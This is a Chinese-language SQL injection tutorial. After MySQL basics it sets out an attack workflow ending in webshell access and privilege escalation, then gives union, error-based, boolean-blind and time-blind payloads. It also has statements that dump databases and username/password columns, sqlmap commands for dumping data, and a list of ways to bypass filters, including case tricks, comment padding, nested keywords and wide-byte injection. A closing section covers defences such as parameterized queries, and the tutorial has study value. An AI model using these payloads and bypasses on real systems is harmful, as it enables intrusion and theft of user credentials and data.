Web—SQL注入攻击
文章目录
- 一、mysql常用语句
- 二、SQL注入概念
-
- 1. 产生原因
- 2. 攻击分类
- 三、攻击流程
-
- 1. 常用检测语句如何识别SQL注入
- 2. Mysql注入常用函数
- 3. 查询数据的核心语法
- 4. 联合查询
- 5. 报错注入
- 6. 布尔盲注
- 7. 时间盲注
- 8. SQL注入爆库语句
- 9. Sqlmap常用命令
- 四、常见防护手段及绕过方式
-
- 1. 参数类型检测及绕过
-
- 1.1 防护思路
- 1.2 有效绕过方式
- 2. 参数长度检测及其绕过
-
- 2.1 检测思路
- 2.2 绕过方式
- 3. 危险参数过滤及绕过
-
- 3.1 防护思路
- 3.2 绕过方式
- 3.3 针对过滤方式的绕过方式汇总
- 4. 参数化查询
-
- 4.1 防护思路
- 五、总结
一、mysql常用语句
mysql -u root -p
show databases # 查看那些数据库
use 数据库名 #进入指定数据库
show tables # 查看数据库中有哪些表
desc 表名 # 查看数据
show create table 表名 # 查看表的细节
select version(); # 查询当前数据库版本
select @@version; # 查询数据库版本
select user(); # 查看当前用户
order by 1; # 指定第几列进行排序
数据库操作:
create database mytest; # 创建名为mytest的数据库
alter database mytest character set utf8; # 修改数据库编码为utf8
show create database mytest; # 查看数据库状态
drop database mytest; # 删除数据库
select database();# 查询当前使用的数据库是哪一个
表操作:
create table tablename(column_name1 colunm_type1, column_name2 colunm_type2); # 创建表
alter table 表名 drop column 列名; # 删除指定列
alter table 表名 add column 列名 column_type; # 添加列
alter table 表名 change 旧列名 新列名 新列名属性; # 修改列名
alter table 表名 modify 列名 新的列名属性; # 修改列属性
show create table 表名; # 查看创建表的语句
desc 表名; # 查看表结构
例子:创建数据表library
CREATE TABLE IF NOT EXISTS `library`(
`lib_id` INT UNSIGNED AUTO_INCREMENT,
`lib_title` VARCHAR(100) NOT NULL,
`lib_author` VARCHAR(40) NOT NULL,
`submission_date` DATE,
PRIMARY KEY ( `lib_id` )
)ENGINE=InnoDB DEFAULT CHARSET=utf8;
重点语句
查询表中数据
select * from 表名; # 查询表中所有内容
select name from users; # 查询 users 表中 name 值;
select * from users where age<30; # where条件语句,可以写 "=" ">" "<"
select * from users limit 1,2; # limit 第一个参数是指定开始位置,第二个参数是个数
插入数据
insert into table_name values(值1, 值2, ......);
insert into table_name (列1, 列2,...) VALUES (值1, 值2,....);
删除数据
delete from 表名 [WHERE Clause]; # 删除指定条件的语句
delect from 表名; # 删除所有数据
更新数据
update 表名 SET 字段1=new-value1, 字段2=new-value2 [WHERE Clause]; # 指定条件更新
语句
二、SQL注入概念
SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。本质是修改当前查询语句的结构,从而获得额外的信息或执行内容。
原理:
用户查询某个信息或者进行订单查询业务时,用户提交相关查询参数,服务器收到参数后进行处理,再将处理后的参数提交到数据库进行查询,之后,将数据库返回的结果显示在页面上,这样就完成了一次查询的过程。但如果用户提交的数据中拼接了查询语句,恰好服务器没有对用户输入的参数进行有效过滤,那么数据库就会根据用户提交的语句进行查询,返回更多信息。
1. 产生原因
通常有一下几点:
- 参数处理问题:
对用户参数进行了错误的类型处理。
转义字符处理环节产生遗漏或可被绕过。 - 服务配置问题:
不安全的数据库配置。
Web应用对错误的处理方式不当:不当的类型处理、不安全的数据库配置、不合理的查询集处理、不当的错误处理、转义字符处理不当、多个提交处理不当。
2. 攻击分类
根据前台的数据是否回显和后台安全配置及防护情况进行区分,主要有两种类型:
- 回显注入
- 盲注
影响SQL注入过程的主要有以下几个方面:
- 数据库是否开启报错请求。
- 服务器端是否允许数据库报错展示。
- 有过滤代码机制
- 服务器开启了参数化查询或对查询过程预编译
- 服务器对查询进行了限速
三、攻击流程
典型的攻击流程如下:
- 判断Web系统使用的脚本语言,发现注入点,并确定是否存在sql注入漏洞
- 判断Web系统的数据库类型
- 判断数据库中表及其相应字段的结构
- 构造注入语句,得到表中的数据内容
- 查找网站管理员后台,用得到的管理员账号和密码登录
- 结合其他漏洞,得到服务器的WebShell并持续链接
- 进一步提权,得到服务器的系统权限
sql手工注入的思路:查找注入点、查库名、查表名、查字段名、查重点数据
1. 常用检测语句如何识别SQL注入
2. Mysql注入常用函数
| 函数名称 | 函数功能 |
|---|---|
| system_user() | 系统用户名 |
| user() | 用户名 |
| current_user() | 当前用户名 |
| session_user() | 连接数据库的用户名 |
| database() | 数据库名 |
| version() | 数据库版本 |
| @@datadir | 数据库路径 |
| @@basedir | 数据库安装路径 |
| @@version_compile_os | 操作系统 |
| count() | 返回执行结果数量 |
| concat() | 没有分隔符地连接字符串 |
| concat_ws() | 有分隔符地连接字符串 |
| group_concat() | 连接一个组的所有字符串,并以逗号分隔每一条数据 |
| load_file() | 读取本地文件 |
| into outfile | 写文件 |
| ascii() | 字符串的ASCII代码值 |
| ord() | 返回字符串第一个字符的ASCII值 |
| mid() | 返回资格字符串的一部分 |
| substr() | 返回一个字符串的一部分 |
| length() | 返回字符串的长度 |
MySql内置数据库 information_schema
information_schema:提供访问数据库元数据的方式,其中保存着关于MYSQL服务器所维护的所有其他数据库的信息,如数据库名,数据库的表,表的数据类型与访问权限等。因此可利用SQL注入方式,通过远程注入查询语句方式实现直接读取MySql数据中information_schema库的信息。
3. 查询数据的核心语法
| 功能名称 | 查询语句 |
|---|---|
| 查库 | select schema_name from information_schema.schemata |
| 查表 | select table_name from information_schema.tables where table_schema=库名 |
| 查列 | select column_name from information_schema.columns where table_name=表名 |
| 查数据 | select 列名 from 库名.表名 |
4. 联合查询
sql语法:
select * from users union select 1,2,3; # 联合查询要保证两次查询的列数相等
union select 1,2,3 -- -
order by ? # 帮我们确定数据表中有多少列数据,二分法快速判定
5. 报错注入
select * from users where id=1 and (select 1 from (select count(),concat(user(),floor(rand(0)2))x
from information_schema.tables group by x)a);
select * from users where id=1 and updatexml(1,concat(0x7e,(select user()),0x7e),1);
使用substr函数来一段段的读取输出的内容
substr("12345678",1,5) -> 12345
updatexml(1,concat(0x5e,substr(version(),1,4),0x5e),1)
select * from users where id=1 and (extractvalue(1,concat(0x7e,(user()),0x7e)));
1. floor()
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by
x)a);
2. extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3. updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4. geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5. multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
6. polygon()
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
7. multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
8. linestring()
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
9. multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
6. 布尔盲注
在实施盲注时,关键在于合理的实现对目标数据的猜测,并利用时间延迟等手段实现猜测正确与否的证明。
盲注的主要特点是:将想要查询的数据作为目标,构造SQL条件判断语句,与要查询的数据进行比较,并让数据库告知当前语句执行是否正确。
select * from users where username="admin" and password="admin";
and length(database())=8 --+ # 判断当前数据库名长度
and substr(database(),1,1)='a' --+ # 使用指定字符一位一位判断截取到的字符
ascii(substr(database(),1,1))=1 --+ # 使用ascii码一位一位比对截取到的字符
7. 时间盲注
if("表达式",条件1,条件2)
and if(length(database())=1,sleep(5),1) --+ # 判断数据库名字
and if(ascii(substr(database(),1,1))=1,sleep(5),1) --+ # ascii码比对字符
sleep(5) # 延时函数,等待五秒
if(表达式,结果1,结果2)
8. SQL注入爆库语句
1.爆库:select group_concat(schema_name) from information_schema.schemata
2.爆表1:select group_concat(table_name) from information_schema.tables where
table_schema='security' 要加引号
爆表2:select table_name from information_schema.tables where
table_schema='security' limit 3,1 加引号
3.爆字段1:select group_concat(column_name) from information_schema.columns where
table_name='users' and table_schema='security' 加引号
爆字段2:select column_name from information_schema.columns where
table_name='users' and table_schema='security' limit 1,1 username,password
4.字段值:select group_concat(username,0x3a,password) from security.users 不加引号
9. Sqlmap常用命令
1. -u "url" 检测注入点
2.--dbs 列出所有数据库的名字
3.--current-db 列出当前数据库的名字
4.-D 指定一个数据库
5.--tables 列出表名
6.-T 指定表名
7.--columns 列出所有字段名
8.-C 指定字段 eg: -D security -T users -C password,username --dump
9.--dump 列出字段内容
10.-D security --dump 爆出数据库所有数据
-u 目标URL
例:sqlmap -u "www.abc.com/index.php?id=1"
-m 后接一个txt文件,文件中是多个url,sqlmap会自动化的检测其中的所有url。
例:sqlmap -m target.txt
-r 可以将一个post请求方式的数据包(bp抓包)保存在一个txt中,sqlmap会通过post方式检测目标。
例:sqlmap -r bp.txt
--data # 指定post参数
sqlmap -u http://xxxx --data "userid=aaa&passwd=bbbb"
--random-agent # 随机ua
--level=LEVEL # 设置测试的等级(1-5,默认为1)lv2:cookie; lv3:user-agent,refere;
lv5:host
--risk=RISK # 升高风险等级会增加数据被篡改的风险。risk 2:基于事件的测试;risk 3:or语句的
测试;risk 4:update的测试
-p 指定测试参数
例: sqlmap -r bp.txt -p "username"
四、常见防护手段及绕过方式
SQL注入的防护方法包括参数过滤和预编译处理,参数过滤分为数据类型显示和危险字符处理。总之就是要么严防死守细致检查,要么严格限定参数的有效范围(参数化查询),尽可能显示用户可提交参数的类型。
1. 参数类型检测及绕过
1.1 防护思路
针对常见的参数提交接口,如参数均为数字,可对参数进行过滤,避免参数中出现非字符类型字符,并对参数长度进行限制。但缺点是会极大的限制提交的参数格式,在需输入多种类型的字符场合下不适用。
可用以下函数实现:
//通过指定的禁止base转换(默认为10进制),返回变量var的integer数值
int intval(mixed $var'[,int $base=10]);
例:$id=intval($id);
//检测表了是否为数字或数字字符串,但此函数允许输入的为负数和小数
bool is_numeric(mixed $var);
例:if(is_numeric($id)){......}
//检测字符串中的字符是否都是数字,负数和小数无法通过检测
ctype_digit
例:if(ctype_digit($id)){......}
1.2 有效绕过方式
使用某些技巧令数据库报错,根据细微查表帮助攻击者识别后台的过滤函数。
若后台没有对出错情况进行相应的处理,则攻击者可以通过正常页面和错误页面的显示猜测数据库的内容。
2. 参数长度检测及其绕过
2.1 检测思路
由于成功执行的SQL注入语句字符数量通常会非常多,远大于正常业务中有效参数的长度,可严格控制提交点的字符长度,使大部分注入语句没办法执行。
在PHP下,可用strlen函数检查输入长度
if(strlen($id)<4) //参数长度是否小于4
2.2 绕过方式
构造简短的语句进行绕过、添加注释符、在构造SQL语句时利用and、or、注释符等修改原有语句意图。
3. 危险参数过滤及绕过
对参数中的敏感信息进行检测和过滤,避免危险字符被系统重构成查询语句,导致SQL注入执行成功。
3.1 防护思路
常见的危险参数过滤方法包括关键字、内置函数、敏感字符的过滤,其过滤方法主要有有以下三种:
- 黑名单过滤
将可能用户注入的敏感字符写入黑名单中,如:’、union、select等,如果发现敏感字符则直接删除,可利用str_replace()函数进行过滤,也可使用正则表达式进行过滤。 - 白名单过滤
例如,用数据库中的已知值进行校对,通常对参数结果将那些合法性校验,复合白名单的数据方可显示。 - 参数转义
对变量默认进行addsalashes(在预定义字符前添加反斜杠),使得SQL注入语句构造失败。 - GPC过滤
GPC是get、post、cookie三种数据接受方式的合称,若用户提交的参数中存在敏感字符,就在其前端添加反斜杠。
防护手段仍建议以黑名单+参数转义为主,这也是针对SQL敏感参数处理的主要方式。
3.2 绕过方式
对应绕过方式主要是利用参数变化的方式来绕过黑名单防护
针对黑名单:
绕过黑名单防护措施的核心思路是:将关键字符或特定符号进行不同形式的变换,从而实现绕过过滤器的目的
- 使用大小写变种
通过改变攻击字符的大小写尝试避开过滤,因为数据库中使用不区分大小写的方式处理SQL关键字。
但如果系统对输入使用了大小写转换,那么该方法就没有用了。 - 使用SQL注释
使用注释代替空格,比如:order/**/by/**/2,这样可以避免后台对关键字字符的过滤,追逐执行SQL语句时,数据库会自动忽视注释符。 - 嵌套
如嵌套过滤的表达式如:selecselectt,过滤之后的部分就可以重新结合成select。 - 使用+实现危险字符的拆分
在数据库中+可作为链接字符串,如or可利用+号拆分为o+r,这样可绕过前台检测且数据库执行时仍为or - 利用系统注释符截断
用“- - ”对后面语句阶段,进而导致SQL语句的语义发生变化。 - 替换可能危险的字符
例如用“like”或“in”替换“=”,均可实现相同的效果。
如果采用黑名单过滤,建议务必限制禁止执行的函数,仅仅禁用敏感字符并不会获得太好的效果。
针对GPC过滤
对GPC添加的“\”进行转义,可尝试宽字节注入方式
3.3 针对过滤方式的绕过方式汇总
- 尖括号过滤绕过方式
如果尖括号被过滤,可使用between和greatest函数替代<>。
//假设目标大于或等于min且小于或等于max,则between返回值为1(true),否则返回0(false)
between min and max
//返回ab中较大的那个数
greatest(a,b)
- 逗号过滤绕过方式
使用from x for y进行绕过。
在报错注入的环境下还可利用数学运算函数在子查询中报错,例如exp函数。 - 空格绕过方式
常见的空格绕过方式为利用注释符进行绕过,除了利用注释符还可利用括号进行绕过,通过括号将参数括起来
id=(sleep(ascii(mid(user()from(1)for(1)))=114))
4. 参数化查询
4.1 防护思路
参数化查询是指数据库服务器在数据库完成SQL指令比那以后,才套用参数运行,就算参数中含有有损的指令,也不会被数据库所运行,仅认为他是一个参数。
由于代码中严格规定了用户输入参数即为数据库的查询内容,导致攻击者无法对当前的sql语句进行修改,也就导致SQL注入失败
五、总结
SQL注入最大的危害在于数据泄露,但SQL注入并不能直接获得Web系统的权限。在对抗SQL注入攻击方面,有效的措施是过滤和转义,针对中小型站点尽可能限制数据类型,限制提交数据的字符类型,对特殊字符及敏感函数进行过滤。针对大型站点推荐利用预编译方法或参数化查询。